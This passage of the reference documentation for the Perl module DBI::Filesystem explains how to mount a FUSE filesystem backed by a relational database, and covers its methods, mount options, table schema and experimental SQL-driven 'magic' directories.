path(s) that correspond to an inode my @paths = $fs->inode2paths($inode); }; if ($@) { warn "file operation failed with $@"; } DESCRIPTION This module can be used to create a fully-functioning "Fuse" userspace filesystem on top of a relational database. Unlike other filesystem-to-DBM mappings, such as Fuse::DBI, this one creates and manages a specific schema designed to support filesystem operations. If you wish to mount a filesystem on an arbitrary DBM schema, you probably want Fuse::DBI, not this. Most filesystem functionality is implemented, including hard and soft links, sparse files, ownership and access modes, UNIX permission checking and random access to binary files. Very large files (up to multiple gigabytes) are supported without performance degradation. Why would you use this? The main reason is that it allows you to use DBMs functionality such as accessibility over the network, database replication, failover, etc. In addition, the underlying DBI::Filesystem module can be extended via subclassing to allow additional functionality such as arbitrary access control rules, searchable file and directory metadata, full-text indexing of file contents, etc. Before mounting the DBMS, you must have created the database and assigned yourself sufficient privileges to read and write to it. You must also create an empty directory to serve as the mount point. A convenient front-end to this library is provided by sqlfs.pl, which is installed along with this library. Unsupported Features The following features are not implemented: * statfs -- df on the filesystem will not provide any useful information on free space or other filesystem information. * extended attributes -- Extended attributes are not supported. * nanosecond times -- atime, mtime and ctime are accurate only to the second. * ioctl -- none are supported * poll -- polling on the filesystem to detect file update events will not work. * lock -- file handle locking among processes running on the local machine works, but protocol-level locking, which would allow cooperative locks on different machines talking to the same database server, is not implemented. You must be the superuser in order to create a file system with the suid and dev features enabled, and must invoke this commmand with the mount options "allow_other", "suid" and/or "dev": -o dev,suid,allow_other Supported Database Management Systems DBMSs differ in what subsets of the SQL language they support, supported datatypes, date/time handling, and support for large binary objects. DBI::Filesystem currently supports MySQL, PostgreSQL and SQLite. Other DBMSs can be supported by creating a subclass file named, e.g. DBI::Filesystem:Oracle, where the last part of the class name corresponds to the DBD driver name ("Oracle" in this example). See DBI::Filesystem::SQLite, DBI::Filesystem::mysql and DBI::Filesystem:Pg for an illustration of the methods that need to be defined/overridden. Fuse Installation/dpavlin/perl-fuse.git $ cd perl-fuse $ perl Makefile.PL $ make test (optional) $ sudo make install HIGH LEVEL METHODS The following methods are most likely to be needed by users of this module. $fs = DBI::Filesystem->new($dsn,{options...}) Create the new DBI::Filesystem object. The mandatory first argument is a DBI data source, in the format "dbi:<driver>:<other_arguments>". The other arguments may include the database name, host, port, and security credentials. See the documentation for your DBMS for details. Non-mandatory options are contained in a hash reference with one or more of the following keys: initialize If true, then initialize the database schema. Many DBMSs require you to create the database first. ignore_permissions If true, then Unix permission checking is not performed when creating/reading/writing files. allow_magic_dirs If true, allow SQL statements in "magic" directories to be executed (see below). WARNING: Initializing the schema quietly destroys anything that might have been there before! $boolean = $fs->ignore_permissions([$boolean]); Get/set the ignore_permissions flag. If ignore_permissions is true, then all permission checks on file and directory access modes are disabled, allowing you to create files owned by root, etc. $boolean = $fs->allow_magic_dirs([$boolean]); Get/set the allow_magic_dirs flag. If true, then directories whose names begin with "%%" will be searched for a dotfile named ".query" that contains a SQL statement to be run every time a directory listing is required from this directory. See getdir() below. $fs->mount($mountpoint, [\%fuseopts]) This method will mount the filesystem on the indicated mountpoint using Fuse and block until the filesystem is unmounted using the "fusermount -u" command or equivalent. The mountpoint must be an empty directory unless the "nonempty" mount option is passed. You may pass in a hashref of options to pass to the Fuse module. Recognized options and their defaults are: debug Turn on verbose debugging of Fuse operations [false] threaded Turn on threaded operations [true] nullpath_ok Allow filehandles on open files to be used even after file is unlinked [true] mountopts Comma-separated list of mount options Mount options to be passed to Fuse are described at. In addition, you may pass the usual mount options such as "ro", etc. They are presented as a comma-separated list as shown here: $fs->mount('/tmp/foo',{debug=>1,mountopts=>'ro,nonempty'}) Common mount options include: Fuse specific nonempty Allow mounting over non-empty directories if true [false] allow_other Allow other users to access the mounted filesystem [false] fsname Set the filesystem source name shown in df and /etc/mtab auto_cache Enable automatic flushing of data cache on open [false] hard_remove Allow true unlinking of open files [true] nohard_remove Activate alternate semantics for unlinking open files (see below) General ro Read-only filesystem dev Allow device-special files nodev Do not allow device-special files suid Allow suid files nosuid Do not allow suid files exec Allow executable files noexec Do not allow executable files atime Update file/directory access times noatime Do not update file/directory access times Some options require special privileges. In particular allow_other must be enabled in /etc/fuse.conf, and the dev and suid options can only be used by the root user. The "hard_remove" mount option is passed by default. This option allows files to be unlinked in one process while another process holds an open filehandle on them. The contents of the file will not actually be deleted until the last open filehandle is closed. The downside of this is that certain functions will fail when called on filehandles connected to unlinked files, including fstat(), ftruncate(), chmod(), and chown(). If this is an issue, then pass option "nohard_remove". This will activate Fuse's alternative semantic in which unlinked open files are renamed to a hidden file with a name like ".fuse_hiddenXXXXXXX'. The hidden file is removed when the last filehandle is closed. $boolean = $fs->mounted([$boolean]) This method returns true if the filesystem is currently mounted. Subclasses can change this value by passing the new value as the argument. Fuse hook functions This module defines a series of short hook functions that form the glue between Fuse's function-oriented callback hooks and this module's object-oriented methods. A typical hook function looks like this: sub e_getdir { my $path = fixup(shift); my @entries = eval {$Self->getdir($path)}; return $Self->errno($@) if $@; return (@entries,0); } The preferred naming convention is that the Fuse callback is named "getdir", the function hook is named e_getdir(), and the method is $fs->getdir(). The DBI::Filesystem object is stored in a singleton global named $Self. The hook fixes up the path it receives from Fuse, and then calls the getdir() method in an eval{} block. If the getdir() method raises an error such as "file not found", the error message is passed to the errno() method to turn into a ERRNO code, and this is returned to the caller. Otherwise, the hook returns the results in the format proscribed by Fuse. If you are subclassing DBI::Filesystem, there is no need to define new hook functions. All hooks described by Fuse are already defined or generated dynamically as needed. Simply create a correctly-named method in your subclass. These are the hooks that are defined: e_getdir e_open e_access e_unlink e_removexattr e_getattr e_release e_rename e_rmdir e_fgetattr e_flush e_chmod e_utime e_mkdir e_read e_chown e_getxattr e_mknod e_write e_symlink e_setxattr e_create e_truncate e_readlink e_listxattr These hooks will be created as needed if a subclass implements the corresponding methods: e_statfs e_lock e_init e_fsync e_opendir e_destroy e_readdir e_utimens e_releasedir e_bmap e_fsyncdir e_ioctl e_poll $inode = $fs->mknod($path,$mode,$rdev) This method creates a file or special file (pipe, device file, etc). The arguments are the path of the file to create, the mode of the file, and the device number if creating a special device file, or 0 if not. The return value is the inode of the newly-created file, an unique integer ID, which is actually the primary key of the metadata table in the underlying database. The path in this, and all subsequent methods, is relative to the mountpoint. For example, if the filesystem is mounted on /tmp/foobar, and the file you wish to create is named /tmp/foobar/dir1/test.txt, then pass "dir1/test.txt". You can also include a leading slash (as in "/dir1/test.txt") which will simply be stripped off. The mode is a bitwise combination of file type and access mode as described for the st_mode field in the stat(2) man page. If you provide just the access mode (e.g. 0666), then the method will automatically set the file type bits to indicate that this is a regular file. You must provide the file type in the mode in order to create a special file. The rdev field contains the major and minor device numbers for device special files, and is only needed when creating a device special file or pipe; ordinarily you can omit it. The rdev field is described in stat(2). Various exceptions can arise during this call including invalid paths, permission errors and the attempt to create a duplicate file name. These will be presented as fatal errors which can be trapped by an eval {}. See $fs->errno() for a list of potential error messages. Like other file-manipulation methods, this will die with a "permission denied" message if the current user does not have sufficient privileges to write into the desired directory. To disable permission checking, set ignore_permissions() to a true value: $fs->ignore_permissions(1) Unless explicitly provided, the mode will be set to 0100777 (all permissions set). $inode = $fs->mkdir($path,$mode) Create a new directory with the specified path and mode and return the inode of the newly created directory. The path and mode are the same as those described for mknod(), except that the filetype bits for $mode will be set to those for a directory if not provided. Like mknod() this method may raise a fatal error, which should be trapped by an eval{}. Unless explicitly provided, the mode will be set to 0040777 (all permissions set). $fs->rename($oldname,$newname) Rename a file or directory. Raises a fatal exception if unsuccessful. $fs->unlink($path) Unlink the file or symlink located at $path. If this is the last reference to the file (via hard links or filehandles) then the contents of the file and its inode will be permanently removed. This will raise a fatal exception on any errors. $fs->rmdir($path) Remove the directory at $path. This method will fail under a variety of conditions, raising a fatal exception. Common errors include attempting to remove a file rather than a directory or removing a directory that is not empty. $fs->link($oldpath,$newpath) Create a hard link from the file at $oldpath to $newpath. If an error occurs the method will die. Note that this method will allow you to create a hard link to directories as well as files. This is disallowed by the "ln" command, and is generally a bad idea as you can create a filesystem with path loops. $fs->symlink($oldpath,$newpath) Create a soft (symbolic) link from the file at $oldpath to $newpath. If an error occurs the method will die. It is safe to create symlinks that involve directories. $path = $fs->readlink($path) Read the symlink at $path and return its target. If an error occurs the method will die. @entries = $fs->getdir($path) Given a directory in $path, return a list of all entries (files, directories) contained within that directory. The '.' and '..' paths are also always returned. This method checks that the current user has read and execute permissions on the directory, and will raise a permission denied error if not (trap this with an eval{}). Experimental feature: If the directory begins with the magic characters "%%" then getdir will look for a dotfile named ".query" within the directory. ".query" must contain a SQL query that returns a series of one or more inodes. These will be used to populate the directory automagically. The query can span multiple lines, and lines that begin with "#" will be ignored. Here is a simple example which will run on all DBMSs. It displays all files with size greater than 2 Mb: select inode from metadata where size>2000000 Another example, which uses MySQL-specific date/time math to find all .jpg files created/modified within the last day: select m.inode from metadata as m,path as p where p.name like '%.jpg' and (now()-interval 1 day) <= m.mtime and m.inode=p.inode (The date/time math syntax is very slightly different for PostgreSQL and considerably different for SQLite) An example that uses extended attributes to search for all documents authored by someone with "Lincoln" in the name: select m.inode from metadata as m,xattr as x where x.name == 'user.Author' and x.value like 'Lincoln%' and m.inode=x.inode The files contained within the magic directories can be read and written just like normal files, but cannot be removed or renamed. Directories are excluded from magic directories. If two or more files from different parts of the filesystem have name clashes, the filesystem will append a number to their end to distinguish them. If the SQL contains an error, then the error message will be contained within a file named "SQL_ERROR". $boolean = $fs->isdir($path) Convenience method. Returns true if the path corresponds to a directory. May raise a fatal error if the provided path is invalid. $fs->chown($path,$uid,$gid) This method changes the user and group ids for the indicated path. It raises a fatal exception on errors. $fs->chmod($path,$mode) This method changes the access mode for the file or directory at the indicated path. The mode in this case is just the three octal word access mode, not the combination of access mode and path type used in mknod(). @stat = $fs->fgetattr($path,$inode) Return the 13-element file attribute list returned by Perl's stat() function, describing an existing file or directory. You may pass the path, and/or the inode of the file/directory. If both are passed, then the inode takes precedence. The returned list will contain: @stat = $fs->getattr($path) Similar to fgetattr() but only the path is accepted. $inode = $fs->open($path,$flags,$info) Open the file at $path and return its inode. $flags are a bitwise OR-ing of the access mode constants including O_RDONLY, O_WRONLY, O_RDWR, O_CREAT, and $info is a hash reference containing flags from the Fuse module. The latter is currently ignored. This method checks read/write permissions on the file and containing directories, unless ignore_permissions is set to true. The open method also increments the file's inuse counter, ensuring that even if it is unlinked, its contents will not be removed until the last open filehandle is closed. The flag constants can be obtained from POSIX. $fh->release($inode) Release a file previously opened with open(), decrementing its inuse count. Be careful to balance calls to open() with release(), or the file will have an inconsistent use count. $data = $fs->read($path,$length,$offset,$inode) Read $length bytes of data from the file at $path, starting at position $offset. You may optionally pass an inode to the method to read from a previously-opened file. On success, the requested data will be returned. Otherwise a fatal exception will be raised (which can be trapped with an eval{}). Note that you do not need to open the file before reading from it. Permission checking is not performed in this call, but in the (optional) open() call. $bytes = $fs->write($path,$data,$offset,$inode) Write the data provided in $data into the file at $path, starting at position $offset. You may optionally pass an inode to the method to read from a previously-opened file. On success, the number of bytes written will be returned. Otherwise a fatal exception will be raised (which can be trapped with an eval{}). Note that the file does not previously need to have been opened in order to write to it, and permission checking is not performed at this level. This checking is performed in the (optional) open() call. $fs->flush( [$path,[$inode]] ) Before data is written to the database, it is cached for a while in memory. flush() will force data to be written to the database. You may pass no arguments, in which case all cached data will be written, or you may provide the path and/or inode to an existing file to flush just the unwritten data associated with that file. $fs->truncate($path,$length) Shorten the contents of the file located at $path to the length indicated by $length. $fs->ftruncate($path,$length,$inode) Like truncate() but you may provide the inode instead of the path. This is called by Fuse to truncate an open file. $fs->utime($path,$atime,$mtime) Update the atime and mtime of the indicated file or directory to the values provided. You must have write permissions to the file in order to do this. $fs->access($path,$access_mode) This method checks the current user's permissions for a file or directory. The arguments are the path to the item of interest, and the mode is one of the following constants: F_OK check for existence of file or a bitwise OR of one or more of: R_OK check that the file can be read W_OK check that the file can be written to X_OK check that the file is executable These constants can be obtained from the POSIX module. $errno = $fs->errno($message) Most methods defined by this module are called within an eval{} to trap errors. On an error, the message contained in $@ is passed to errno() to turn it into a UNIX error code. The error code is then returned to the Fuse module. The following is the limited set of mappings performed: Eval{} error message Unix Errno Context -------------------- ---------- ------- not found ENOENT Path lookups file exists EEXIST Path creation is a directory EISDIR Attempt to open/read/write a directory not a directory ENOTDIR Attempt to list entries from a file length beyond end of file EINVAL Truncate file to longer than current length not empty ENOTEMPTY Attempt to remove a directory that is in use permission denied EACCESS Access modes don't allow requested operation The full error message usually has further detailed information. For example the full error message for "not found" is "$path not found" where $path contains the requested path. All other errors, including problems in the underlying DBI database layer, result in an error code of EIO ("I/O error"). These constants can be obtained from POSIX. $result = $fs->setxattr($path,$name,$val,$flags) This method sets the extended attribute named $name to the value indicated by $val for the file or directory in $path. The Fuse documentation states that $flags will be one of XATTR_REPLACE or XATTR_CREATE, but in my testing I have only seen the value 0 passed. On success, the method returns 0. $val = $fs->getxattr($path,$name) Reads the extended attribute named $name from the file or directory at $path and returns the value. Will return undef if the attribute not found. Note that when the filesystem is mounted, the Fuse interface provides no way to distinguish between an attribute that does not exist versus one that does exist but has value "0". The only workaround for this is to use "attr -l" to list the attributes and look for the existence of the desired attribute. @attribute_names = $fs->listxattr($path) List all xattributes for the file or directory at the indicated path and return them as a list. $fs->removexattr($path,$name) Remove the attribute named $name for path $path. Will raise a "no such attribute" error if then if the attribute does not exist. LOW LEVEL METHODS The following methods may be of interest for those who wish to understand how this module works, or want to subclass and extend this module. $fs->initialize_schema This method is called to initialize the database schema. The database must already exist and be writable by the current user. All previous data will be deleted from the database. The default schema contains three tables: metadata -- Information about the inode used for the stat() call. This includes its length, modification and access times, permissions, and ownership. There is one row per inode, and the inode is the table's primary key. path -- Maps paths to inodes. Each row is a distinct component of a path and contains the name of the component, the inode of the parent component, and the inode corresponding to the component. This is illustrated below. extents -- Maps inodes to the contents of the file. Each row consists of the inode of the file, the block number of the data, and a blob containing the data in that block. For the mysql adapter, here is the current schema: metadata: +--------+------------+------+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +--------+------------+------+-----+---------------------+----------------+ | inode | int(10) | NO | PRI | NULL | auto_increment | | mode | int(10) | NO | | NULL | | | uid | int(10) | NO | | NULL | | | gid | int(10) | NO | | NULL | | | rdev | int(10) | YES | | 0 | | | links | int(10) | YES | | 0 | | | inuse | int(10) | YES | | 0 | | | size | bigint(20) | YES | | 0 | | | mtime | timestamp | NO | | 0000-00-00 00:00:00 | | | ctime | timestamp | NO | | 0000-00-00 00:00:00 | | | atime | timestamp | NO | | 0000-00-00 00:00:00 | | +--------+------------+------+-----+---------------------+----------------+ path: +--------+--------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +--------+--------------+------+-----+---------+-------+ | inode | int(10) | NO | | NULL | | | name | varchar(255) | NO | | NULL | | | parent | int(10) | YES | MUL | NULL | | +--------+--------------+------+-----+---------+-------+ extents: +----------+---------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +----------+---------+------+-----+---------+-------+ | inode | int(10) | YES | MUL | NULL | | | block | int(10) | YES | | NULL | | | contents | blob | YES | | NULL | | +----------+---------+------+-----+---------+-------+ The metadata table is straightforward. The meaning of most columns can be inferred from the stat(2) manual page. The only columns that may be mysterious are "links" and "inuse". "links" describes the number of distinct paths involving a file or directory. Files start out with one link and are incremented by one every time a hardlink is created (symlinks don't count). Directories start out with two links (one for '..' and the other for '.') and are incremented by one every time a file or subdirectory is added to the directory. The "inuse" column is incremented every time a file is opened for reading or writing, and decremented when the file is closed. It is used to prevent the content from being deleted if the file is still in use. The path table is organized to allow rapid translation from a pathname to an inode. Each entry in the tree is identified by its inode, its name, and the inode of its parent directory. The inode of the root "/" node is hard-coded to 1. The following steps show the effect of creating subdirectories and files on the path table: After initial filesystem initialization there is only one entry in paths corresponding to the root directory. The root has no parent: +-------+------+--------+ | inode | name | parent | +-------+------+--------+ | 1 | / | NULL | +-------+------+--------+ $ mkdir directory1 +-------+------------+--------+ | inode | name | parent | +-------+------------+--------+ | 1 | / | NULL | | 2 | directory1 | 1 | +-------+------------+--------+ $ mkdir directory1/subdir_1_1 +-------+------------+--------+ | inode | name | parent | +-------+------------+--------+ | 1 | / | NULL | | 2 | directory1 | 1 | | 3 | subdir_1_1 | 2 | +-------+------------+--------+ $ mkdir directory2 +-------+------------+--------+ | inode | name | parent | +-------+------------+--------+ | 1 | / | NULL | | 2 | directory1 | 1 | | 3 | subdir_1_1 | 2 | | 4 | directory2 | 1 | +-------+------------+--------+ $ touch directory2/file1.txt +-------+------------+--------+ | inode | name | parent | +-------+------------+--------+ | 1 | / | NULL | | 2 | directory1 | 1 | | 3 | subdir_1_1 | 2 | | 4 | directory2 | 1 | | 5 | file1.txt | 4 | +-------+------------+--------+ $ ln directory2/file1.txt link_to_file1.txt +-------+-------------------+--------+ | inode | name | parent | +-------+-------------------+--------+ | 1 | / | NULL | | 2 | directory1 | 1 | | 3 | subdir_1_1 | 2 | | 4 | directory2 | 1 | | 5 | file1.txt | 4 | | 5 | link_to_file1.txt | 1 | +-------+-------------------+--------+ Notice in the last step how creating a hard link establishes a second entry with the same inode as the original file, but with a different name and parent. The inode for path /directory2/file1.txt can be found with this recursive-in-spirit SQL fragment: select inode from path where name="file1.txt" and parent in (select inode from path where name="directory2" and parent in (select 1) ) The extents table provides storage of file (and symlink) contents. During testing, it turned out that storing the entire contents of a file into a single BLOB column provided very poor random access performance. So instead the contents are now broken into blocks of constant size 4096 bytes. Each row of the table corresponds to the inode of the file, the block number (starting at 0), and the data contained within the block. In addition to dramatically better read/write performance, this scheme allows sparse files (files containing "holes") to be stored efficiently: Blocks that fall within holes are completely absent from the table, while those that lead into a hole are shorter than the full block length. The logical length of the file is stored in the metadata size column. If you have subclassed DBI::Filesystem and wish to adjust the default schema (such as adding indexes), this is the place to do it. Simply call the inherited initialize_schema(), and then alter the tables as you please. $ok = $fs->check_schema This method is called when opening a preexisting database. It checks that the metadata, path and extents tables exist in the database and have the expected relationships. Returns true if the check passes. $version = $fs->schema_version This method returns the schema version understood by this module. It is used when opening up a sqlfs databse to check whether database was created by an earlier or later version of the software. The schema version is distinct from the library version since updates to the library do not always necessitate updates to the schema. Versions are small integers beginning at 1. $version = $fs->get_schema_version This returns the schema version known to a preexisting database. $fs->set_schema_version($version) This sets the databases's schema version to the indicated value. $fs->check_schema_version This checks whether the schema version in a preexisting database is compatible with the version known to the library. If the version is from an earlier version of the library, then schema updating will be attempted. If the database was created by a newer version of the software, the method will raise a fatal exception. $fs->_update_schema_from_A_to_B Every update to this library that defines a new schema version has a series of methods named _update_schema_from_A_to_B(), where A and B are sequential version numbers. For example, if the current schema version is 3, then the library will define the following methods: $fs->_update_schema_from_1_to_2 $fs->_update_schema_from_2_to_3 These methods are only of interests to people who want to write adapters for DBMS engines that are not currently supported, such as Oracle. This method returns the blocksize (currently 4096 bytes) used for writing and retrieving file contents to the extents table. Because 4096 is a typical value used by libc, altering the value in subclasses will probably degrade performance. Also be aware that altering the blocksize will render filesystems created with other blocksize values unreadable. $count = $fs->flushblocks This method returns the maximum number of blocks of file contents data that can be stored in memory before it is written to disk. Because all blocks are written to the database in a single transaction, this can have a dramatic performance effect and it is worth trying different values when tuning the module for new DBMSs. The default is 64. $fixed_path = fixup($path) This is an ordinary function (not a method!) that removes the initial slash from paths passed to this module from Fuse. The root directory (/) is not changed: Before After fixup() ------ ------------- /foo foo /foo/bar foo/bar / / To call this method from subclasses, invoke it as DBI::Filesystem::fixup(). $dsn = $fs->dsn This method returns the DBI data source passed to new(). It cannot be changed. $dbh = $fs->dbh This method opens a connection to the database defined by dsn() and returns the database handle (or raises a fatal exception). The database handle will have its RaiseError and AutoCommit flags set to true. Since the mount function is multithreaded, there will be one database handle created per thread. $inode = $fs->create_inode($type,$mode,$rdev,$uid,$gid) This method creates a new inode in the database. An inode corresponds to a file, directory, symlink, pipe or block special device, and has a unique integer ID defining it as its primary key. Arguments are the type of inode to create, which is used to check that the passed mode is correct ('f'=file, 'd'=directory,'l'=symlink; anything else is ignored), the mode of the inode, which is a combination of type and access permissions as described in stat(2), the device ID if a special file, and the desired UID and GID. The return value is the newly-created inode ID. You will ordinarily use the mknod() and mkdir() methods to create files, directories and special files. $id = $fs->last_inserted_inode($dbh) After a new inode is inserted into the database, this method returns its ID. Unique inode IDs are generated using various combinations of database autoincrement and sequence semantics, which vary from DBMS to DBMS, so you may need to override this method in subclasses. The default is simply to call DBI's last_insert_id method: $dbh->last_insert_id(undef,undef,undef,undef) $self->create_path($inode,$path) After creating an inode, you can associate it with a path in the filesystem using this method. It will raise an error if unsuccessful. $inode=$self->create_inode_and_path($path,$type,$mode,$rdev) Create an inode and associate it with the indicated path, returning the inode ID. Arguments are the path, the file type (one of 'd', 'f', or 'l' for directory, file or symbolic link). As usual, this may exit with a fatal error. $fs->unlink_inode($inode) Given an inode, this deletes it and its contents, but only if the file is no longer in use. It will die with an exception if the changes cannot be committed to the database. $boolean = $fs->check_path($name,$inode,$uid,$gid) Given a directory's name, inode, and the UID and GID of the current user, this will traverse all containing directories checking that their execute permissions are set. If the directory and all of its parents are executable by the current user, then returns true. $fs->check_perm($inode,$access_mode) Given a file or directory's inode and the access mode (a bitwise OR of R_OK, W_OK, X_OK), checks whether the current user is allowed access. This will return if access is allowed, or raise a fatal error potherwise. $fs->touch($inode,$field) This updates the file/directory indicated by $inode to the current time. $field is one of 'atime', 'ctime' or 'mtime'. $inode = $fs->path2inode($path) ($inode,$parent_inode,$name) = $self->path2inode($path) This method takes a filesystem path and transforms it into an inode if the path is valid. In a scalar context this method return just the inode. In a list context, it returns a three element list consisting of the inode, the inode of the containing directory, and the basename of the file. This method does permission and access path checking, and will die with a "permission denied" error if either check fails. In addition, passing an invalid path will return a "path not found" error. @paths = $fs->inode2paths($inode) Given an inode, this method returns the path(s) that correspond to it. There may be multiple paths since file inodes can have hard links. In addition, there may be NO path corresponding to an inode, if the file is open but all externally accessible links have been unlinked. Be aware that the path table is indexed to make path to inode searches fast, not the other way around. If you build a content search engine on top of DBI::Filesystem and rely on this method, you may wish to add an index to the path table's "inode" field. $groups = $fs->get_groups($uid,$gid) This method takes a UID and GID, and returns the primary and supplemental groups to which the user is assigned, and is used during permission checking. The result is a hashref in which the keys are the groups to which the user belongs. $ctx = $fs->get_context This method is a wrapper around the fuse_get_context() function described in Fuse. If called before the filesystem is mounted, then it fakes the call, returning a context object based on the information in the current process. SUBCLASSING Subclass this module as you ordinarily would by creating a new package that has a "use base DBI::Filesystem". You can then tell the command-line sqlfs.pl tool to load your subclass rather than the original by providing a --module (or -M) option, as in: $ sqlfs.pl -MDBI::Filesystem::MyClass <database> <mtpt> AUTHOR LICENSE This package is distributed under the terms of the Perl Artistic License 2.0. See. 1 POD Error The following errors were encountered while parsing the POD: - Around line 2168: Unknown directive: =Head2
https://metacpan.org/pod/DBI::Filesystem
CC-MAIN-2020-16
refinedweb
6,116
53.41
We are about to switch to a new forum software. Until then we have removed the registration on this forum. So I need to write a code for a user to enter a number equal or greater than 3. Then the output should be the fibonacci sequence up until that number entered. For example, if a user enters 9, then the output should be 1,1,2,3,5,8. My problem is that it's showing a few extra terms and anything I try messes it up more. please help I would very much appreciate it. I'm very new to processing. Here's the code I have so far: import javax.swing.JOptionPane; Answers You want to show Fibonacci numbers up until the number entered. But this isn't the check that your code is doing. If you input N, it's not giving you the Fibonacci numbers less than N. Instead, it's giving you the first N+1 Fibonacci numbers. You should rewrite your loop as a while loop, not a for loop. Your while loop should run until the number that it would print next is more than the limit entered. figured it out thanks to your advice. Thanks so much! I just changed the for and didnt even actually need sum.
https://forum.processing.org/two/discussion/18644/fibonacci-sequence-code-something-little-wrong-somewhere-but-not-sure-how-to-fix-it
CC-MAIN-2019-47
refinedweb
217
85.39
On October 17, 2016 at 8:34:11 PM, Ngie Cooper (yaneurab...@gmail.com) wrote: Advertising > On Oct 17, 2016, at 18:55, Marcel Moolenaar <mar...@freebsd.org> wrote: > *snip* > +CFLAGS+=-I${SRCTOP}/sys/sys/disk Isn't it a better app idea to maintain the disk/ namespace for includes? Thanks! You mean, add -I${SRCTOP}//sys/sys on the compile line and change the code to use #include <disk/foo.h>? Unfortunately, that creates conflicts with header files that are included as <stdfoo.h> and match headers we have under sys/sys. signature.asc Description: Message signed with OpenPGP using AMPGpg
https://www.mail-archive.com/svn-src-all@freebsd.org/msg132050.html
CC-MAIN-2017-04
refinedweb
102
59.7
a long time I had py2exe 0.6.9 working well, and recently it started giving me the following strange error instead of starting my app. I tried reverting my code and installation to an earlier state, but am not sure where this is coming from. One interesting thing is the traceback looks like a circular dependency started by 'os' and later win32api tries to call os.path. Also stat.py doesn't import anything. I tried Python 2.5.4 and Python 2.6.5. I use GTK 2.16 and Windows XP. Traceback (most recent call last): File "c:\python25\lib\site-packages\py2exe\boot_common.py", line 92, in <module> import linecache File "linecache.pyo", line 9, in <module>' Traceback (most recent call last): File "bleachbit.py", line 29, in <module> import os' Best regards, Andrew Hi Josh, [Sorry about the private reply, I'm not used to reply being reply to sender only] 2010/3/10 Josh English <joshua.r.english@...>: > Has anyone tried making a PortableApp using wxPython? Task Coach is available as a PortableApp. It's done in three steps: use py2exe to create a .exe, use a custom-made distutils command to create a folder structure according to the PortableApps spec and then use the PortableApps installer to create the paf.exe file. Feel free to check out the Task Coach sources and have a look. Cheers, Frank I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details
https://sourceforge.net/p/py2exe/mailman/py2exe-users/?viewmonth=201004&viewday=3&style=flat
CC-MAIN-2016-30
refinedweb
277
76.93
Ok in this tutorial we will write a class that will draw objects to the screen, this will be useful when we want to start creating entities or GUI objects. So lets get started... First create 2 new files, Sprite.h and Sprite.cpp Open up Sprite.h and lets get coding #ifndef _SPRITE_H_ #define _SPRITE_H_ #include <SDL.h> class Sprite { public: Sprite(); static SDL_Surface* Load(char* pFile); static bool Draw(SDL_Surface* dest, SDL_Surface* src, int x, int y); static bool Draw(SDL_Surface* dest, SDL_Surface* src, int x, int y, int x2, int y2, int width, int height); }; #endif So thats the Sprite.h file, its quite basic for the moment but we will extend it and improve upon it over time, but for now this will do nicely. Lets write the functions themselves now, open up the Sprite.cpp #include "Sprite.h" // constructor Sprite::Sprite() { } here we will load the file needed to draw the surface, this will be the filename of a compatible BMP, we create 2 pointers to SDL surfaces and set them to NULL. These surfaces are used to store the data of the created surface, one is used to load the file onto, and the other is used to optimize the surface, we then return the optimized surface and free the unused temp surface SDL_Surface* Sprite::Load(char* File) { SDL_Surface* temp = NULL; SDL_Surface* optimized = NULL; if((temp = SDL_LoadBMP(File)) == NULL) { return NULL; } optimized = SDL_DisplayFormatAlpha(temp); SDL_FreeSurface(temp); return optimized; } now we need to have a function that blits the BMP to an SDL surface, we pass in the screen and the name of the surface we loaded our BMP onto, we also pass in where we want to draw it. We use the x and y values to create an SDL_Rect, we then blit to this using SDL_Blitsurface(); bool Sprite::Draw(SDL_Surface* dest, SDL_Surface* src, int x, int y) { if(dest == NULL || src == NULL) { return false; } SDL_Rect destR; destR.x = x; destR.y = y; SDL_BlitSurface(src, NULL, dest, &destR); return true; } this next function only draws part of the bitmap, this is especially useful when using sprite sheets as you will find out in later tutorials, we pass in the values for an SDL_Rect again like last time, but we now will create another rectangle this one will be used to tell which part of the image to draw, so if we where to pass in x2 = 0, y2 = 0, w = 50, h = 50 , it would draw the top corner of the image, a 50 x 50 square. bool Sprite::Draw(SDL_Surface* dest, SDL_Surface* src, int x, int y, int x2, int y2, int width, int height) { if(dest == NULL || src == NULL) { return false; } SDL_Rect destR; destR.x = x; destR.y = x; SDL_Rect srcR; srcR.x = x2; srcR.y = y2; srcR.w = width; srcR.h = height; SDL_BlitSurface(src, &srcR, dest, &destR); return true; } Ok so thats our sprite class, we can use this to draw any image to the screen and also draw only the parts of the image that we want. lets test these functions out inside our game loop. Open up the Game.h file and add this code // we need to include the "Sprite.h" file that we just created #include "Sprite.h" private: // add a surface to test our functions. SDL_Surface* testSprite; now open up the Game.cpp file and add some more code // inside the Init function add this code testSprite = NULL; testSprite = Sprite::Load("test.bmp"); // now inside the Draw function add this code Sprite::Draw(m_pScreen, testSprite, 0, 0); Ok now build and run, you should see the image in the top left corner of the window, pretty easy huh ok now we need to test our other function, we can use the same image we loaded last time so in Game.cpp file // inside our Draw function Sprite::Draw(m_pScreen, testSprite, 300, 300, 0, 0, 50, 50); Now build and run, you should see a small 50x50 square of our original image. So to recap we created a sprite class, I call it a sprite class but if it makes more sense you could call it a drawing class or whatever your prefer. This class blits images to the screen, we also created a function to only draw specific parts of an image. One thing we need to do after all that is to free our test sprite surface so as to avoid memory leaks, we can use our Clean function in Game.cpp to add this code SDL_FreeSurface(testSprite); Ok now we are done, next time we will incorporate some transparency and also an external library to use images other than BMP's. Heres the image I used Number of downloads: 1532 Happy Coding.
http://www.dreamincode.net/forums/topic/112191-beginning-sdl-part-3-a-spritedrawing-class/
CC-MAIN-2016-26
refinedweb
788
75.95
